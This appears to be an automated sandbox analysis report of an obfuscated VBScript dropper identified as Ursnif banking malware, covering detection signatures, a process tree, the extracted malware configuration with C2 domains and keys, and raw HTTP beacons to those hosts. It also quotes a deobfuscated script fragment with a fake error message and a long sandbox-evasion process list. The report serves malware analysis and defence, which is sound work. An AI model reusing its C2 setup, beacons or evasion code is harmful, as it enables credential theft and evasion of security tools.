Loading ...

Play interactive tourEdit tour

Windows Analysis Report start[2021.09.09_15-26].vbs

Overview

General Information

Sample Name:start[2021.09.09_15-26].vbs
Analysis ID:481181
MD5:3959f76d91c30f3c14916f80a6c4cf23
SHA1:2c918bff7f9073762308af3876777afc8507e3a8
SHA256:1d02060d7493d25e46e7cdf76fc05aa6c80493f40db75d48700f1eb17431191d
Infos:

Most interesting Screenshot:

Detection

Ursnif
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Multi AV Scanner detection for submitted file
Benign windows process drops PE files
VBScript performs obfuscated calls to suspicious functions
Yara detected Ursnif
System process connects to network (likely due to code injection or exploit)
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Creates processes via WMI
Found API chain indicative of debugger detection
Found evasive API chain (may stop execution after checking system information)
Deletes itself after installation
Writes registry values via WMI
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Queries the installation date of Windows
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Drops files with a non-matching file extension (content does not match file extension)
AV process strings found (often used to terminate AV products)
Java / VBScript file with very long strings (likely obfuscated code)
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Found evasive API chain checking for process token information
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Launches processes in debugging mode, may be used to hinder debugging
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Dropped file seen in connection with other malware
Uses Microsoft's Enhanced Cryptographic Provider
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Found WSH timer for Javascript or VBS script (likely evasive script)

Classification

Process Tree

  • System is w10x64
  • wscript.exe (PID: 3840 cmdline: C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\start[2021.09.09_15-26].vbs' MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C)
  • WmiPrvSE.exe (PID: 1304 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: A782A4ED336750D10B3CAF776AFE8E70)
    • rundll32.exe (PID: 2396 cmdline: rundll32 C:\Users\user\AppData\Local\Temp\fum.cpp,DllRegisterServer MD5: 73C519F050C20580F8A62C849D49215A)
      • rundll32.exe (PID: 5236 cmdline: rundll32 C:\Users\user\AppData\Local\Temp\fum.cpp,DllRegisterServer MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
  • WmiPrvSE.exe (PID: 1848 cmdline: C:\Windows\sysWOW64\wbem\wmiprvse.exe -secured -Embedding MD5: 7AB59579BA91115872D6E51C54B9133B)
  • cleanup

Malware Configuration

Threatname: Ursnif

{"lang_id": "RU, CN", "RSA Public Key": "IAodzSkRRXZVbpA8JuABjuUBQvpHiTpdg9dOAQp7bBw4t0xkkPvGywDaeciS3HngU/RkNYsOricM2S0LVvdwWlSJ6FdKpFt6YFFWOrsBfCiNFCtU5v/Ohii1LI6H4/OB/132O4comC2he+ED1d47BeoZGdamjIEdPypU4ReJbSLrCxcRMW03mJzNzM22WWjes9V+fVfZ8lvnVONnlm+2SejHIEhpJMv4VzqUiuRgWDBCh1ovNzO3eDJUiuSU1jFcdmg2ywuZOyDLXh6uuRZonMVTxMoziZw6y80jGvuwDFFQy5TMx6xbKoXdqNSwE60TugFay/vbpOuG0fp4zORCVEe39fTGD2o0Gttx0E5BI4w=", "c2_domain": ["atl.bigbigpoppa.com", "pop.urlovedstuff.com"], "botnet": "2500", "server": "580", "serpent_key": "Do9L8DmcVMtyFi6j", "sleep_time": "5", "CONF_TIMEOUT": "20", "SetWaitableTimer_value": "1"}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000017.00000003.607221952.00000000050C8000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
    00000017.00000003.607028050.00000000050C8000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
      00000017.00000003.606994412.00000000050C8000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
        00000017.00000003.607255595.00000000050C8000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
          00000017.00000003.607169997.00000000050C8000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
            Click to see the 5 entries

            Sigma Overview

            No Sigma rule has matched

            Jbx Signature Overview

            Click to jump to signature section

            Show All Signature Results

            AV Detection:

            barindex
            Found malware configurationShow sources
            Source: 00000017.00000003.577173150.0000000000B30000.00000040.00000001.sdmpMalware Configuration Extractor: Ursnif {"lang_id": "RU, CN", "RSA Public Key": "IAodzSkRRXZVbpA8JuABjuUBQvpHiTpdg9dOAQp7bBw4t0xkkPvGywDaeciS3HngU/RkNYsOricM2S0LVvdwWlSJ6FdKpFt6YFFWOrsBfCiNFCtU5v/Ohii1LI6H4/OB/132O4comC2he+ED1d47BeoZGdamjIEdPypU4ReJbSLrCxcRMW03mJzNzM22WWjes9V+fVfZ8lvnVONnlm+2SejHIEhpJMv4VzqUiuRgWDBCh1ovNzO3eDJUiuSU1jFcdmg2ywuZOyDLXh6uuRZonMVTxMoziZw6y80jGvuwDFFQy5TMx6xbKoXdqNSwE60TugFay/vbpOuG0fp4zORCVEe39fTGD2o0Gttx0E5BI4w=", "c2_domain": ["atl.bigbigpoppa.com", "pop.urlovedstuff.com"], "botnet": "2500", "server": "580", "serpent_key": "Do9L8DmcVMtyFi6j", "sleep_time": "5", "CONF_TIMEOUT": "20", "SetWaitableTimer_value": "1"}
            Multi AV Scanner detection for submitted fileShow sources
            Source: start[2021.09.09_15-26].vbsVirustotal: Detection: 10%Perma Link
            Antivirus detection for URL or domainShow sources
            Source: http://atl.bigbigpoppa.com/Avira URL Cloud: Label: malware
            Source: http://pop.urlovedstuff.com/FYLjL0FWG/A8A_2FylIs_2BN6G7XZV/uXdtwH9ZjhHPJVfO4Ke/_2B2DA3Bxr3hT97jg6X5cf/HmT9c0wd9uTFE/mjIXEmZg/7w1x_2BJ7UrOUMBuwkzmQs_/2B_2B90mhB/GdhMF2xI5ZZQZOsRZ/w8ERaF_2FKjr/oJe_2BmPqxj/UioALST3UPW_2B/x25T0SA4ncGBrSmoWvhyD/GJA93v_2Bs5_2FOu/bRGYPwsER1HateV/PYXudbMJvsQ83oCtuH/3_2FsJC5W/WltZ3WhV77sZrxWGfR6s/bNzIeDiXMV8LnHFQlB1/BK37js8oH2L1YJRuiB3U5s/fOdLI1WLm_2Bt/WCukq3AFEXzr/kh2Avira URL Cloud: Label: malware
            Source: http://atl.bigbigpoppa.com/R4Q64ljn5F0AeB0LyB/NuqzcVKz_/2FKpDeUm0fBCI1AQABSO/SrwJzbiGX2y5piswKvk/JCTAvira URL Cloud: Label: malware
            Source: http://pop.bigbigpoppa.com/Avira URL Cloud: Label: malware
            Source: http://pop.urlovedstuff.com/FYLjL0FWG/A8A_2FylIs_2BN6G7XZV/uXdtwH9ZjhHPJVfO4Ke/_2B2DA3Bxr3hT97jg6X5cAvira URL Cloud: Label: malware
            Source: http://atl.bigbigpoppa.com/0su8VV6_2B3_2B/puf6UG3h9deC_2Ft6TxKM/_2FYbenbgPpDMagU/M3qvcdiaQn_2FfY/O5dAvira URL Cloud: Label: malware
            Multi AV Scanner detection for domain / URLShow sources
            Source: pop.urlovedstuff.comVirustotal: Detection: 8%Perma Link
            Source: atl.bigbigpoppa.comVirustotal: Detection: 8%Perma Link
            Multi AV Scanner detection for dropped fileShow sources
            Source: C:\Users\user\AppData\Local\Temp\fum.cppReversingLabs: Detection: 13%
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 23_2_00C23276 CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError,
            Source: Binary string: c:\Led-Flower\Spell\cotton_point\please.pdb source: wscript.exe, 00000000.00000003.555373535.00000262C5114000.00000004.00000001.sdmp, rundll32.exe, 00000017.00000002.735989389.0000000070374000.00000002.00020000.sdmp, fum.cpp.0.dr
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 23_2_7034AC85 FindFirstFileExW,

            Networking:

            barindex
            Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
            Source: TrafficSnort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.3:49789 -> 185.251.90.253:80
            Source: TrafficSnort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49789 -> 185.251.90.253:80
            Source: TrafficSnort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.3:49790 -> 185.251.90.253:80
            Source: TrafficSnort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49790 -> 185.251.90.253:80
            Source: TrafficSnort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.3:49791 -> 185.251.90.253:80
            Source: TrafficSnort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49791 -> 185.251.90.253:80
            System process connects to network (likely due to code injection or exploit)Show sources
            Source: C:\Windows\SysWOW64\rundll32.exeDomain query: atl.bigbigpoppa.com
            Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 185.251.90.253 80
            Source: C:\Windows\SysWOW64\rundll32.exeDomain query: pop.urlovedstuff.com
            Source: Joe Sandbox ViewASN Name: SPRINTHOSTRU SPRINTHOSTRU
            Source: Joe Sandbox ViewIP Address: 185.251.90.253 185.251.90.253
            Source: global trafficHTTP traffic detected: GET /R4Q64ljn5F0AeB0LyB/NuqzcVKz_/2FKpDeUm0fBCI1AQABSO/SrwJzbiGX2y5piswKvk/JCT7aFfMHddlV3_2FIkW8P/ayLC_2Bshelva/2X_2Bg56/7jrpWKChL2MGyrBCg5dLHkp/afoZMxsy1T/Wp7_2FPeXCx8Q_2BZ/qOUTFrHwatL_/2B9CZYfq_2B/hvctvVLoqJu_2B/vpIx1k_2FVAj6zT_2F3t3/6fHnbpgCWlIc40kF/GNgoS4_2BmIaDcC/8SXP0dHgwB95tBuoyP/x_2BcO7Jg/2OPTdoZOpI7RlGA8Y18Y/JYFZfFiYFwCa3nBrqzw/H_2B8_2FkkexIGmoFzmcpf/7smS06LtDXKEe/c HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:90.0) Gecko/20100101 Firefox/90.0Host: atl.bigbigpoppa.com
            Source: global trafficHTTP traffic detected: GET /FYLjL0FWG/A8A_2FylIs_2BN6G7XZV/uXdtwH9ZjhHPJVfO4Ke/_2B2DA3Bxr3hT97jg6X5cf/HmT9c0wd9uTFE/mjIXEmZg/7w1x_2BJ7UrOUMBuwkzmQs_/2B_2B90mhB/GdhMF2xI5ZZQZOsRZ/w8ERaF_2FKjr/oJe_2BmPqxj/UioALST3UPW_2B/x25T0SA4ncGBrSmoWvhyD/GJA93v_2Bs5_2FOu/bRGYPwsER1HateV/PYXudbMJvsQ83oCtuH/3_2FsJC5W/WltZ3WhV77sZrxWGfR6s/bNzIeDiXMV8LnHFQlB1/BK37js8oH2L1YJRuiB3U5s/fOdLI1WLm_2Bt/WCukq3AFEXzr/kh2 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:90.0) Gecko/20100101 Firefox/90.0Host: pop.urlovedstuff.com
            Source: global trafficHTTP traffic detected: GET /0su8VV6_2B3_2B/puf6UG3h9deC_2Ft6TxKM/_2FYbenbgPpDMagU/M3qvcdiaQn_2FfY/O5d7t6b51CsWR3vpDy/zU3pR9vjY/lPgvi3S86qplQEaQf_2B/jxDYlqt8BjtcOWY_2FN/ohwhXl17Lh66734_2Fqn_2/FgCM3Tnuck0nF/J0S1YKxS/oTav10uGKUAnWla7FsZqe_2/BIXpQqvfaR/nMso0hdyU8dnVmjyD/LLoIt20KVY7z/9GJ5tvt7Ozs/NXB1gCveQulFzL/ZrjIdUFvH1uWGi_2BuvX_/2BGZEq0uPSkXlrhP/QwzrBUc1U9Q1ZY4/HzIgE26R/E HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:90.0) Gecko/20100101 Firefox/90.0Host: atl.bigbigpoppa.com
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 10 Sep 2021 11:52:04 GMTContent-Type: text/html; charset=utf-8Content-Length: 146Connection: closeVary: Accept-EncodingData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
            Source: rundll32.exe, 00000017.00000002.732610833.000000000066A000.00000004.00000020.sdmpString found in binary or memory: http://atl.bigbigpoppa.com/
            Source: rundll32.exe, 00000017.00000002.733066508.00000000006D5000.00000004.00000001.sdmpString found in binary or memory: http://atl.bigbigpoppa.com/0su8VV6_2B3_2B/puf6UG3h9deC_2Ft6TxKM/_2FYbenbgPpDMagU/M3qvcdiaQn_2FfY/O5d
            Source: rundll32.exe, 00000017.00000003.651548557.00000000006CF000.00000004.00000001.sdmpString found in binary or memory: http://atl.bigbigpoppa.com/R4Q64ljn5F0AeB0LyB/NuqzcVKz_/2FKpDeUm0fBCI1AQABSO/SrwJzbiGX2y5piswKvk/JCT
            Source: rundll32.exe, 00000017.00000002.732610833.000000000066A000.00000004.00000020.sdmpString found in binary or memory: http://pop.bigbigpoppa.com/
            Source: rundll32.exe, 00000017.00000003.652840050.00000000006D5000.00000004.00000001.sdmp, rundll32.exe, 00000017.00000003.697690406.00000000006D5000.00000004.00000001.sdmpString found in binary or memory: http://pop.urlovedstuff.com/FYLjL0FWG/A8A_2FylIs_2BN6G7XZV/uXdtwH9ZjhHPJVfO4Ke/_2B2DA3Bxr3hT97jg6X5c
            Source: unknownDNS traffic detected: queries for: atl.bigbigpoppa.com
            Source: global trafficHTTP traffic detected: GET /R4Q64ljn5F0AeB0LyB/NuqzcVKz_/2FKpDeUm0fBCI1AQABSO/SrwJzbiGX2y5piswKvk/JCT7aFfMHddlV3_2FIkW8P/ayLC_2Bshelva/2X_2Bg56/7jrpWKChL2MGyrBCg5dLHkp/afoZMxsy1T/Wp7_2FPeXCx8Q_2BZ/qOUTFrHwatL_/2B9CZYfq_2B/hvctvVLoqJu_2B/vpIx1k_2FVAj6zT_2F3t3/6fHnbpgCWlIc40kF/GNgoS4_2BmIaDcC/8SXP0dHgwB95tBuoyP/x_2BcO7Jg/2OPTdoZOpI7RlGA8Y18Y/JYFZfFiYFwCa3nBrqzw/H_2B8_2FkkexIGmoFzmcpf/7smS06LtDXKEe/c HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:90.0) Gecko/20100101 Firefox/90.0Host: atl.bigbigpoppa.com
            Source: global trafficHTTP traffic detected: GET /FYLjL0FWG/A8A_2FylIs_2BN6G7XZV/uXdtwH9ZjhHPJVfO4Ke/_2B2DA3Bxr3hT97jg6X5cf/HmT9c0wd9uTFE/mjIXEmZg/7w1x_2BJ7UrOUMBuwkzmQs_/2B_2B90mhB/GdhMF2xI5ZZQZOsRZ/w8ERaF_2FKjr/oJe_2BmPqxj/UioALST3UPW_2B/x25T0SA4ncGBrSmoWvhyD/GJA93v_2Bs5_2FOu/bRGYPwsER1HateV/PYXudbMJvsQ83oCtuH/3_2FsJC5W/WltZ3WhV77sZrxWGfR6s/bNzIeDiXMV8LnHFQlB1/BK37js8oH2L1YJRuiB3U5s/fOdLI1WLm_2Bt/WCukq3AFEXzr/kh2 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:90.0) Gecko/20100101 Firefox/90.0Host: pop.urlovedstuff.com
            Source: global trafficHTTP traffic detected: GET /0su8VV6_2B3_2B/puf6UG3h9deC_2Ft6TxKM/_2FYbenbgPpDMagU/M3qvcdiaQn_2FfY/O5d7t6b51CsWR3vpDy/zU3pR9vjY/lPgvi3S86qplQEaQf_2B/jxDYlqt8BjtcOWY_2FN/ohwhXl17Lh66734_2Fqn_2/FgCM3Tnuck0nF/J0S1YKxS/oTav10uGKUAnWla7FsZqe_2/BIXpQqvfaR/nMso0hdyU8dnVmjyD/LLoIt20KVY7z/9GJ5tvt7Ozs/NXB1gCveQulFzL/ZrjIdUFvH1uWGi_2BuvX_/2BGZEq0uPSkXlrhP/QwzrBUc1U9Q1ZY4/HzIgE26R/E HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:90.0) Gecko/20100101 Firefox/90.0Host: atl.bigbigpoppa.com

            Key, Mouse, Clipboard, Microphone and Screen Capturing:

            barindex
            Yara detected UrsnifShow sources
            Source: Yara matchFile source: 00000017.00000003.607221952.00000000050C8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000017.00000003.607028050.00000000050C8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000017.00000003.606994412.00000000050C8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000017.00000003.607255595.00000000050C8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000017.00000003.607169997.00000000050C8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000017.00000003.607202425.00000000050C8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000017.00000003.607241313.00000000050C8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000017.00000003.607113605.00000000050C8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000017.00000002.735811134.00000000050C8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 5236, type: MEMORYSTR

            E-Banking Fraud:

            barindex
            Yara detected UrsnifShow sources
            Source: Yara matchFile source: 00000017.00000003.607221952.00000000050C8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000017.00000003.607028050.00000000050C8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000017.00000003.606994412.00000000050C8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000017.00000003.607255595.00000000050C8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000017.00000003.607169997.00000000050C8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000017.00000003.607202425.00000000050C8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000017.00000003.607241313.00000000050C8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000017.00000003.607113605.00000000050C8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000017.00000002.735811134.00000000050C8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 5236, type: MEMORYSTR
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 23_2_00C23276 CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError,

            System Summary:

            barindex
            Writes registry values via WMIShow sources
            Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
            Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
            Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 23_2_70332274
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 23_2_00C2725F
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 23_2_00C27E30
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 23_2_00C21754
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 23_2_7033F000
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 23_2_70348AA5
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 23_2_70354362
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 23_2_7034D536
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 23_2_7033F500
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 23_2_70350770
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 23_2_70331382 GetProcAddress,NtCreateSection,memset,
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 23_2_703314FE SetThreadPriority,NtQuerySystemInformation,Sleep,GetLongPathNameW,GetLongPathNameW,GetLongPathNameW,WaitForSingleObject,GetExitCodeThread,CloseHandle,GetLastError,GetLastError,
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 23_2_70331B4A NtMapViewOfSection,
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 23_2_70332495 NtQueryVirtualMemory,
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 23_2_00C240DC NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 23_2_00C28055 NtQueryVirtualMemory,
            Source: start[2021.09.09_15-26].vbsInitial sample: Strings found which are bigger than 50
            Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\fum.cpp 8C5BA29FBEEDF62234916D84F3A857A3B086871631FD87FABDFC0818CF049587
            Source: start[2021.09.09_15-26].vbsVirustotal: Detection: 10%
            Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\start[2021.09.09_15-26].vbs'
            Source: unknownProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeProcess created: C:\Windows\System32\rundll32.exe rundll32 C:\Users\user\AppData\Local\Temp\fum.cpp,DllRegisterServer
            Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32 C:\Users\user\AppData\Local\Temp\fum.cpp,DllRegisterServer
            Source: unknownProcess created: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe C:\Windows\sysWOW64\wbem\wmiprvse.exe -secured -Embedding
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeProcess created: C:\Windows\System32\rundll32.exe rundll32 C:\Users\user\AppData\Local\Temp\fum.cpp,DllRegisterServer
            Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32 C:\Users\user\AppData\Local\Temp\fum.cpp,DllRegisterServer
            Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32
            Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process
            Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Processor
            Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::create
            Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Temp\adobe.urlJump to behavior
            Source: classification engineClassification label: mal100.troj.evad.winVBS@7/2@4/1
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 23_2_00C22102 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeProcess created: C:\Windows\System32\rundll32.exe rundll32 C:\Users\user\AppData\Local\Temp\fum.cpp,DllRegisterServer
            Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\start[2021.09.09_15-26].vbs'
            Source: C:\Windows\SysWOW64\rundll32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: start[2021.09.09_15-26].vbsStatic file information: File size 1393062 > 1048576
            Source: Binary string: c:\Led-Flower\Spell\cotton_point\please.pdb source: wscript.exe, 00000000.00000003.555373535.00000262C5114000.00000004.00000001.sdmp, rundll32.exe, 00000017.00000002.735989389.0000000070374000.00000002.00020000.sdmp, fum.cpp.0.dr

            Data Obfuscation:

            barindex
            VBScript performs obfuscated calls to suspicious functionsShow sources
            Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: WScript.Sleep Int((Theodosian-AFQ+1)*Rnd+AFQ)REM diary character casework. 6326440 Fayetteville flaxen Doolittle Ballard backpack Alcoa loyal offertory Nicaragua axe Toni End WithEAX = MsgBox("Cant start because MSVCR101.dll is missing from your computer. Try reinstalling the program to fix this problem.", vbSystemModal+vbCritical, "System Error")Gnk("DEBUG: F_MESSAGE - True")REM bow megabyte plenitude aspirate stationery. handicapper nit frozen restaurateur Tennessee Millikan hark limerick Macedon camel Brandon hereunto disquisition plasm anatomic End FunctionFunction yNzk()Gnk("DEBUG: FS_PROCESS - Start")REM emboss indigestion surly rebuttal Kaskaskia upslope lightface stimulus vintner tabernacle male shy inhibit bravado mozzarella otherwise Gnk("DEBUG: FS_PROCESSCOUNT - Start")on error resume nextDim Theodosian,AFQTheodosian=6000' elongate conjoin protactinium monocular warplane riot rubidium bebop skyward contributory metabole stepchild lenticular rich fleabane Frisian AFQ=3000Randomize' thieving Kurt sovereign Simpson, anthropomorphic rhombic Monica loan transpose larch least farmhouse mercuric, tabletop hoosegow highboy camelopard WScript.Sleep Int((Theodosian-AFQ+1)*Rnd+AFQ)yDVFproc = ((((42 + (-27.0)) + 343.0) - 276.0) + (-82.0))wSQ = Array("frida-winjector-helper-64.exe","frida-winjector-helper-32.exe","pythonw.exe","pyw.exe","cmdvirth.exe","alive.exe","filewatcherservice.exe","ngvmsvc.exe","sandboxierpcss.exe","analyzer.exe","fortitracer.exe","nsverctl.exe","sbiectrl.exe","angar2.exe","goatcasper.exe","ollydbg.exe","sbiesvc.exe","apimonitor.exe","GoatClientApp.exe","peid.exe","scanhost.exe","apispy.exe","hiew32.exe","perl.exe","scktool.exe","apispy32.exe","hookanaapp.exe","petools.exe","sdclt.exe","asura.exe","hookexplorer.exe","pexplorer.exe","sftdcc.exe","autorepgui.exe","httplog.exe","ping.exe","shutdownmon.exe","autoruns.exe","icesword.exe","pr0c3xp.exe","sniffhit.exe","autorunsc.exe","iclicker-release.exe",".exe","prince.exe","snoop.exe","autoscreenshotter.exe","idag.exe","procanalyzer.exe","spkrmon.exe","avctestsuite.exe","idag64.exe","processhacker.exe","sysanalyzer.exe","avz.exe","idaq.exe","processmemdump.exe","syser.exe","behaviordumper.exe","immunitydebugger.exe","procexp.exe","systemexplorer.exe","bindiff.exe","importrec.exe","procexp64.exe","systemexplorerservice.exe","BTPTrayIcon.exe","imul.exe","procmon.exe","sython.exe","capturebat.exe","Infoclient.exe","procmon64.exe","taskmgr.exe","cdb.exe","installrite.exe","python.exe","taslogin.exe","ipfs.exe","pythonw.exe","tcpdump.exe","clicksharelauncher.exe","iprosetmonitor.exe","qq.exe","tcpview.exe","closepopup.exe","iragent.exe","qqffo.exe","timeout.exe","commview.exe","iris.exe","qqprotect.exe","totalcmd.exe","cports.exe","joeboxcontrol.exe","qqsg.exe","trojdie.kvpcrossfire.exe","joeboxserver.exe","raptorclient.exe","txplatform.exe","dnf.exe","lamer.exe","regmon.exe","virus.exe","dsniff.exe","LogHTTP.exe","regshot.exe","vx.exe","dumpcap.exe","lordpe.exe","RepMgr64.exe","win
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 23_2_70332210 push ecx; ret
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 23_2_70332263 push ecx; ret
